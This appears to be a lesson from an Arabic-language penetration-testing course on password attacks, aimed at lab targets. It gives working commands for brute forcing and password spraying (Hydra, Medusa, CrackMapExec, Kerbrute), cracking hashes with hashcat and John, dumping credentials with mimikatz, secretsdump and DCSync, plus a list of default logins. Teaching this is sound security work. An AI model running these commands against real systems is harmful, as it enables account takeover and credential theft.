الدرس 12 من 24

تحليل الثغرات والاستغلال

هجمات كلمات المرور

4 دقيقة للقراءة

هجمات كلمات المرور تبقى من أكثر الطرق فعالية للحصول على الوصول. يغطي هذا الدرس تقنيات كسر كلمات المرور عبر الإنترنت وبدون اتصال.

هجمات كلمات المرور عبر الإنترنت

الهجمات عبر الإنترنت تستهدف الخدمات الحية. استخدمها بحذر لتجنب قفل الحسابات.

Hydra (متعدد البروتوكولات)

القوة الغاشمة لـ SSH:

hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10

FTP:

hydra -L users.txt -P passwords.txt ftp://10.10.10.10

تسجيل دخول HTTP POST:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

SMB:

hydra -L users.txt -P passwords.txt smb://10.10.10.10

خيارات Hydra

العلم الغرض
-l اسم مستخدم واحد
-L قائمة أسماء مستخدمين
-p كلمة مرور واحدة
-P قائمة كلمات مرور
-t الخيوط (افتراضي 16)
-f التوقف بعد أول مطابقة
-v إخراج تفصيلي

CrackMapExec (Windows/AD)

# رش كلمة مرور SMB
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt

# WinRM
crackmapexec winrm 10.10.10.10 -u user -p password

# فحص المسؤول المحلي
crackmapexec smb 10.10.10.10 -u user -p password --local-auth

Medusa

# هجوم SSH
medusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh

# HTTP
medusa -h 10.10.10.10 -u admin -P passwords.txt -M http -m DIR:/admin

كسر كلمات المرور بدون اتصال

الهجمات بدون اتصال تعمل على الهاشات الملتقطة بدون تفاعل شبكي.

تحديد الهاش

# باستخدام hashid
hashid 'hash_here'

# باستخدام hash-identifier
hash-identifier

# أنماط الهاش الشائعة
MD5:         32 حرف سداسي عشري
SHA1:        40 حرف سداسي عشري
SHA256:      64 حرف سداسي عشري
NTLM:        32 حرف سداسي عشري (Windows)
bcrypt:      بادئة $2a$2b$2y$

Hashcat (بقوة GPU)

الاستخدام الأساسي:

hashcat -m <mode> hash.txt wordlist.txt

الأوضاع الشائعة:

الوضع نوع الهاش
0 MD5
100 SHA1
1400 SHA256
1000 NTLM
3200 bcrypt
1800 sha512crypt ($6$)
500 md5crypt ($1$)
13100 Kerberoast
18200 AS-REP Roast

كسر NTLM:

hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt

مع القواعد:

hashcat -m 1000 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule

John the Ripper

الاستخدام الأساسي:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

تحديد الصيغة:

john --format=raw-md5 --wordlist=rockyou.txt hashes.txt
john --format=nt --wordlist=rockyou.txt ntlm_hashes.txt

إظهار المكسورة:

john --show hashes.txt

استخراج الهاشات

هاشات كلمات مرور Linux

# الهاشات مخزنة في /etc/shadow
# الصيغة: user:$id$salt$hash:...

# Unshadow لـ John
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt

هاشات كلمات مرور Windows

من قاعدة بيانات SAM (محلي):

# مع Impacket (إذا كان لديك وصول مسؤول)
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# باستخدام mimikatz على الهدف
mimikatz# sekurlsa::logonpasswords

من وحدة تحكم النطاق:

# هجوم DCSync
impacket-secretsdump domain.local/admin:password@10.10.10.10

هجمات رش كلمة المرور

رش كلمة مرور واحدة على العديد من المستخدمين لتجنب القفل:

# باستخدام CrackMapExec
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123!' --continue-on-success

# باستخدام Kerbrute (Kerberos)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt 'Password123!'

قوائم الكلمات

قوائم كلمات Kali المدمجة

/usr/share/wordlists/
├── rockyou.txt           # الأكثر شيوعاً
├── dirb/common.txt       # دلائل الويب
├── dirbuster/            # المزيد من قوائم كلمات الويب
└── seclists/             # مجموعة شاملة

قوائم كلمات مخصصة

باستخدام cewl:

# توليد قائمة كلمات من موقع
cewl http://10.10.10.10 -w custom_wordlist.txt

# مع العمق والحد الأدنى لطول الكلمة
cewl http://10.10.10.10 -d 2 -m 5 -w custom.txt

باستخدام crunch:

# توليد جميع التركيبات من 4 أحرف
crunch 4 4 abcdefghijklmnopqrstuvwxyz -o wordlist.txt

# مع نمط
crunch 8 8 -t Pass@@%% -o wordlist.txt
# @ = حروف صغيرة، , = حروف كبيرة، % = رقم، ^ = رمز

بيانات الاعتماد الافتراضية الشائعة

جرب هذه دائماً قبل القوة الغاشمة:

الخدمة اسم المستخدم كلمة المرور
SSH root، admin root، admin، password
MySQL root (فارغ)، root، mysql
PostgreSQL postgres postgres
Tomcat tomcat، admin tomcat، admin، s3cret
Jenkins admin admin
phpMyAdmin root (فارغ)
WordPress admin admin

سير عمل هجوم كلمة المرور

1. استطلاع المستخدمين
   └── SMTP، RID cycling، استطلاع الويب

2. تجربة بيانات الاعتماد الافتراضية
   └── فحص وثائق الخدمة

3. رش كلمة المرور (إذا كان هناك العديد من المستخدمين)
   └── كلمات مرور شائعة: Password1، Welcome1

4. القوة الغاشمة المستهدفة (إذا كان هناك قليل من المستخدمين)
   └── hydra مع rockyou.txt

5. الكسر بدون اتصال (إذا تم الحصول على هاشات)
   └── hashcat مع القواعد

مع إتقان تقنيات الاستغلال، سننتقل لهجمات تطبيقات الويب في الوحدة التالية. :::

اختبار

الوحدة 3: تحليل الثغرات والاستغلال

خذ الاختبار